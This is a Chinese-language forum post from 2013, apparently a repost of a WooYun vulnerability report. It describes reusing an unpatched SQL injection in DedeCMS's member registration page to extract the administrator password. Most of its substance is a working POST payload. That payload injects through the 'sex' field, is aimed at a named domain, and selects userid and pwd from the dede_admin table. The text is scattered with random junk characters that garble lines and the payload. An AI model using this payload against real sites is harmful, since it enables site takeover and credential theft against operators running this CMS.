找回密码
 立即注册
查看: 2341|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞" I9 Q: w; `0 L, g! W
简要描述:' r+ E2 s) Y/ Y, ^6 K5 {0 P

% F7 {$ M6 l4 w; [需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.# J1 `( g! k$ i
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; f4 {% y5 K. t) e1 K
详细说明:跟这个漏洞
# C* S2 e! R/ Q; a8 |  {' C
1 q& T' D' y, l7 ^WooYun: Dedecms SQL注射导致审核机制绕过漏洞: ?# X% Z2 r' C+ n  y/ B1 C+ L2 X5 C
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的." H, l% ]& ~  e4 `% X
POST提交以下数据,其实不用POST提交的,这样隐蔽点.2 }' ^  K5 o. i6 i

  K4 l/ D$ y  `& }9 X# z: Twww.political-security.com/member/reg_new.php' Q  ~' d. L4 j
, T$ U+ E' R; U# _' i
POST
3 a6 W  d; {$ T1 j" t
% D4 {; F3 `$ z% Odopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
- k  I, A' J: p. E5 \- ~9 F1 ?( Tuserid=c4rp3nt3r&uname=c4rp3nt3r
3 o( s6 o' ~( J3 {8 ?. V+ m&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
0 p/ p& n3 }0 S6 \5 O" v( |&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
; K0 w. V' E( {* l7 v8 g. J(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
4 X5 Y" l: ?* B2 q% I%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表